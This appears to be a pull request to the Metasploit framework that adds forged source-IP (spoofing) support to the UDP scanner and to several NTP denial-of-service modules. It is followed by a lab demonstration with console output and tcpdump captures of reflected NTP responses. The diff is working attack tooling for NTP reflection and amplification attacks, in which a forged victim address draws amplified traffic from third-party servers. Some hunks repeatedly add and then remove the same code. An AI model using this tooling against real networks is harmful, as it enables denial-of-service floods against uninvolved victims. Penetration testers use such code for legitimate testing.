### PR TITLE
Update UDPScanner to support sending from a forged IP, update NTP DDoS modules to use this to demonstrate impact

### DIFF
--- a/lib/msf/core/auxiliary/drdos.rb
+++ b/lib/msf/core/auxiliary/drdos.rb
@@ -8,6 +8,15 @@ module Msf
 ###
 module Auxiliary::DRDoS
 
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        OptAddress.new('SRCIP', [false, 'Use this source IP']),
+        OptInt.new('NUM_REQUESTS', [false, 'Number of requests to send', 1]),
+      ], self.class)
+  end
+
   def prove_amplification(response_map)
     vulnerable = false
     proofs = []
@@ -41,6 +50,10 @@ module Auxiliary::DRDoS
     end
 
     [ vulnerable, proofs.join(', ') ]
+  end
+
+  def spoofed?
+    !datastore['SRCIP'].nil?
   end
 
 end

--- a/lib/msf/core/auxiliary/ntp.rb
+++ b/lib/msf/core/auxiliary/ntp.rb
@@ -1,6 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/proto/ntp'
-
+require 'msf/core/exploit'
 module Msf
 
 ###
@@ -10,6 +10,7 @@ module Msf
 ###
 module Auxiliary::NTP
 
+  include Exploit::Capture
   include Auxiliary::Scanner
 
   #
@@ -28,6 +29,16 @@ module Auxiliary::NTP
         OptInt.new('VERSION', [true, 'Use this NTP version', 2]),
         OptInt.new('IMPLEMENTATION', [true, 'Use this NTP mode 7 implementation', 3])
       ], self.class)
+  end
+
+  # Called for each IP in the batch
+  def scan_host(ip)
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@probe, ip, datastore['RPORT'])
+    end
   end
 end
 end

--- a/lib/msf/core/auxiliary/udp_scanner.rb
+++ b/lib/msf/core/auxiliary/udp_scanner.rb
@@ -69,6 +69,24 @@ module Auxiliary::UDPScanner
     scanner_postscan(batch)
   end
 
+  # Send a spoofed packet to a given host and port
+  def scanner_spoof_send(data, ip, port, srcip, num_packets=1)
+    open_pcap
+    p = PacketFu::UDPPacket.new
+    p.ip_saddr = srcip
+    p.ip_daddr = ip
+    p.ip_ttl = 255
+    p.udp_src = (rand((2**16)-1024)+1024).to_i
+    p.udp_dst = port
+    p.payload = @probe
+    p.recalc
+    1.upto(num_packets) do |x|
+      print_status("Sending packet to #{ip} from #{srcip}")
+      capture_sendto(p, ip)
+    end
+    close_pcap
+  end
+
   # Send a packet to a given host and port
   def scanner_send(data, ip, port)
 

--- a/lib/msf/core/auxiliary/udp_scanner.rb
+++ b/lib/msf/core/auxiliary/udp_scanner.rb
@@ -80,8 +80,8 @@ module Auxiliary::UDPScanner
     p.udp_dst = port
     p.payload = @probe
     p.recalc
+    print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}")
     1.upto(num_packets) do |x|
-      print_status("Sending packet to #{ip} from #{srcip}")
       capture_sendto(p, ip)
     end
     close_pcap

--- a/lib/msf/core/auxiliary/udp_scanner.rb
+++ b/lib/msf/core/auxiliary/udp_scanner.rb
@@ -78,7 +78,7 @@ module Auxiliary::UDPScanner
     p.ip_ttl = 255
     p.udp_src = (rand((2**16)-1024)+1024).to_i
     p.udp_dst = port
-    p.payload = @probe
+    p.payload = data
     p.recalc
     print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}")
     1.upto(num_packets) do |x|

--- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb
@@ -8,6 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -48,7 +49,12 @@ class Metasploit3 < Msf::Auxiliary
 
   # Called for each IP in the batch
   def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@probe, ip, datastore['RPORT'])
+    end
   end
 
   # Called for each response packet

--- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb
@@ -8,7 +8,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
-  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -47,17 +46,7 @@ class Metasploit3 < Msf::Auxiliary
     ], self.class)
   end
 
-  # Called for each IP in the batch
-  def scan_host(ip)
-    if spoofed?
-      datastore['ScannerRecvWindow'] = 0
-      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
-    else
-      scanner_send(@probe, ip, datastore['RPORT'])
-    end
-  end
-
-  # Called for each response packet
+# Called for each response packet
   def scanner_process(data, shost, sport)
     @results[shost] ||= { messages: [], peers: [] }
     @results[shost][:messages] << Rex::Proto::NTP::NTPPrivate.new(data)

--- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb
@@ -8,7 +8,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
-  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -33,16 +32,6 @@ class Metasploit3 < Msf::Auxiliary
       'DisclosureDate' => 'Aug 25 2014',
       'License'        => MSF_LICENSE
     )
-  end
-
-  # Called for each IP in the batch
-  def scan_host(ip)
-    if spoofed?
-      datastore['ScannerRecvWindow'] = 0
-      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
-    else
-      scanner_send(@probe, ip, datastore['RPORT'])
-    end
   end
 
   # Called before the scan block

--- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb
@@ -8,6 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -36,7 +37,12 @@ class Metasploit3 < Msf::Auxiliary
 
   # Called for each IP in the batch
   def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@probe, ip, datastore['RPORT'])
+    end
   end
 
   # Called before the scan block

--- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb
@@ -8,6 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -36,7 +37,12 @@ class Metasploit3 < Msf::Auxiliary
 
   # Called for each IP in the batch
   def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@probe, ip, datastore['RPORT'])
+    end
   end
 
   # Called for each response packet

--- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb
@@ -8,7 +8,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
-  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -33,16 +32,6 @@ class Metasploit3 < Msf::Auxiliary
       'DisclosureDate' => 'Aug 25 2014',
       'License'        => MSF_LICENSE
     )
-  end
-
-  # Called for each IP in the batch
-  def scan_host(ip)
-    if spoofed?
-      datastore['ScannerRecvWindow'] = 0
-      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
-    else
-      scanner_send(@probe, ip, datastore['RPORT'])
-    end
   end
 
   # Called for each response packet

--- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb
@@ -8,7 +8,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
-  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -34,16 +33,6 @@ class Metasploit3 < Msf::Auxiliary
       'DisclosureDate' => 'Aug 25 2014',
       'License'        => MSF_LICENSE
     )
-  end
-
-  # Called for each IP in the batch
-  def scan_host(ip)
-    if spoofed?
-      datastore['ScannerRecvWindow'] = 0
-      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
-    else
-      scanner_send(@probe, ip, datastore['RPORT'])
-    end
   end
 
   # Called for each response packet

--- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb
@@ -8,6 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -37,7 +38,12 @@ class Metasploit3 < Msf::Auxiliary
 
   # Called for each IP in the batch
   def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@probe, ip, datastore['RPORT'])
+    end
   end
 
   # Called for each response packet

--- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb
@@ -8,6 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -38,7 +39,12 @@ class Metasploit3 < Msf::Auxiliary
 
   # Called for each IP in the batch
   def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@probe, ip, datastore['RPORT'])
+    end
   end
 
   # Called for each response packet

--- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb
@@ -8,7 +8,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
-  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -35,16 +34,6 @@ class Metasploit3 < Msf::Auxiliary
       'DisclosureDate' => 'Aug 25 2014',
       'License'        => MSF_LICENSE
     )
-  end
-
-  # Called for each IP in the batch
-  def scan_host(ip)
-    if spoofed?
-      datastore['ScannerRecvWindow'] = 0
-      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
-    else
-      scanner_send(@probe, ip, datastore['RPORT'])
-    end
   end
 
   # Called for each response packet

--- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb
@@ -8,6 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -36,7 +37,12 @@ class Metasploit3 < Msf::Auxiliary
 
   # Called for each IP in the batch
   def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@probe, ip, datastore['RPORT'])
+    end
   end
 
   # Called for each response packet

--- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb
@@ -8,7 +8,6 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
-  include Msf::Exploit::Capture
   include Msf::Exploit::Remote::Udp
   include Msf::Auxiliary::UDPScanner
   include Msf::Auxiliary::NTP
@@ -33,16 +32,6 @@ class Metasploit3 < Msf::Auxiliary
       'DisclosureDate' => 'Aug 25 2014',
       'License'        => MSF_LICENSE
     )
-  end
-
-  # Called for each IP in the batch
-  def scan_host(ip)
-    if spoofed?
-      datastore['ScannerRecvWindow'] = 0
-      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
-    else
-      scanner_send(@probe, ip, datastore['RPORT'])
-    end
   end
 
   # Called for each response packet


### PR DESCRIPTION
This PR adds the ability to perform IP based spoofing using several modules. This makes reflection based attacks easier to demonstrate.

Example:

``` text
msf > use auxiliary/scanner/ntp/ntp_peer_list_dos
msf auxiliary(ntp_peer_list_dos) > set RHOSTS 10.0.0.61
RHOSTS => 10.0.0.61
emsf auxiliary(ntp_peer_list_dos) > set SRCIP 10.0.0.60
SRCIP => 10.0.0.60
msf auxiliary(ntp_peer_list_dos) > set NUM_REQUESTS 3
NUM_REQUESTS => 3
msf auxiliary(ntp_peer_list_dos) > run

[*] Sending packet to 10.0.0.61 from 10.0.0.60
[*] Sending packet to 10.0.0.61 from 10.0.0.60
[*] Sending packet to 10.0.0.61 from 10.0.0.60
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

---

tcpdump on .60

``` text
    10.0.0.61.ntp > 10.0.0.62.54290: [udp sum ok] NTPv2, length 168
    Reserved, Leap indicator: -1s (128), Stratum 0 (unspecified), poll 3 (8s), precision 0
    Root Delay: 5.000488, Root dispersion: 23485.350692, Reference-ID: (unspec)
      Reference Timestamp:  0.000000000
      Originator Timestamp: 0.000000000
      Receive Timestamp:    7531952.000006851 (2036/05/04 03:40:48)
      Transmit Timestamp:   1815955956.001877025 (2093/08/23 23:40:52)
        Originator - Receive Timestamp:  7531952.000006851 (2036/05/04 03:40:48)
        Originator - Transmit Timestamp: 1815955956.001877025 (2093/08/23 23:40:52)
12:21:32.300625 IP (tos 0xc0, ttl 64, id 45118, offset 0, flags [DF], proto UDP (17), length 196)
    10.0.0.61.ntp > 10.0.0.62.54290: [udp sum ok] NTPv2, length 168
    Reserved, Leap indicator: -1s (128), Stratum 0 (unspecified), poll 3 (8s), precision 0
    Root Delay: 5.000488, Root dispersion: 23485.350692, Reference-ID: (unspec)
      Reference Timestamp:  0.000000000
      Originator Timestamp: 0.000000000
      Receive Timestamp:    7531952.000006851 (2036/05/04 03:40:48)
      Transmit Timestamp:   1815955956.001877025 (2093/08/23 23:40:52)
        Originator - Receive Timestamp:  7531952.000006851 (2036/05/04 03:40:48)
        Originator - Transmit Timestamp: 1815955956.001877025 (2093/08/23 23:40:52)
12:21:32.301361 IP (tos 0xc0, ttl 64, id 45119, offset 0, flags [DF], proto UDP (17), length 196)
    10.0.0.61.ntp > 10.0.0.62.54290: [udp sum ok] NTPv2, length 168
    Reserved, Leap indicator: -1s (128), Stratum 0 (unspecified), poll 3 (8s), precision 0
    Root Delay: 5.000488, Root dispersion: 23485.350692, Reference-ID: (unspec)
      Reference Timestamp:  0.000000000
      Originator Timestamp: 0.000000000
      Receive Timestamp:    7531952.000006851 (2036/05/04 03:40:48)
      Transmit Timestamp:   1815955956.001877025 (2093/08/23 23:40:52)
        Originator - Receive Timestamp:  7531952.000006851 (2036/05/04 03:40:48)
        Originator - Transmit Timestamp: 1815955956.001877025 (2093/08/23 23:40:52)

``
```
